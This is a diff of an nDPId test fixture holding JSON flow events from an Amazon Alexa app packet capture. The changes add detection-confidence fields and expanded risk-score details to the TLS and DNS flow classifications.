 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":49,"flow_first_seen":1490976088631,"flow_last_seen":1490976098828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":18884,"flow_avg_l4_payload_len":385,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -1035,66 +1035,66 @@
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976114906,"flow_last_seen":1490976117017,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":230,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976114921,"flow_last_seen":1490976117016,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2611,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976114940,"flow_last_seen":1490976120960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5531,"flow_avg_l4_payload_len":263,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976030894,"flow_last_seen":1490976194743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13865,"flow_avg_l4_payload_len":478,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976030894,"flow_last_seen":1490976194743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13865,"flow_avg_l4_payload_len":478,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976150029,"flow_last_seen":1490976164211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":2962,"flow_avg_l4_payload_len":148,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976158680,"flow_last_seen":1490976164214,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2813,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976114879,"flow_last_seen":1490976114880,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976114879,"flow_last_seen":1490976114880,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976169531,"flow_last_seen":1490976175920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2883,"flow_avg_l4_payload_len":160,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976186818,"flow_last_seen":1490976186879,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195921,"flow_last_seen":1490976195980,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976187242,"flow_last_seen":1490976187508,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
-00713{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976029756,"flow_last_seen":1490976171313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5024,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976186818,"flow_last_seen":1490976186879,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195921,"flow_last_seen":1490976195980,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976187242,"flow_last_seen":1490976187508,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
+00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976029756,"flow_last_seen":1490976171313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5024,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976165062,"flow_last_seen":1490976175921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1290,"flow_tot_l4_payload_len":3345,"flow_avg_l4_payload_len":176,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976164994,"flow_last_seen":1490976165058,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195484,"flow_last_seen":1490976195524,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976196840,"flow_last_seen":1490976196938,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976164994,"flow_last_seen":1490976165058,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195484,"flow_last_seen":1490976195524,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976196840,"flow_last_seen":1490976196938,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1490976115905,"flow_last_seen":1490976120950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10788,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976116084,"flow_last_seen":1490976117005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976116084,"flow_last_seen":1490976117005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976116084,"flow_last_seen":1490976117005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976196016,"flow_last_seen":1490976196282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00716{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1490976067968,"flow_last_seen":1490976168824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":26805,"flow_avg_l4_payload_len":478,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976133936,"flow_last_seen":1490976134135,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":124,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976195633,"flow_last_seen":1490976195989,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6582,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
-00663{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976090991,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5257,"flow_avg_l4_payload_len":194,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976091048,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00822{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1490976067968,"flow_last_seen":1490976168824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":26805,"flow_avg_l4_payload_len":478,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976133936,"flow_last_seen":1490976134135,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":124,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
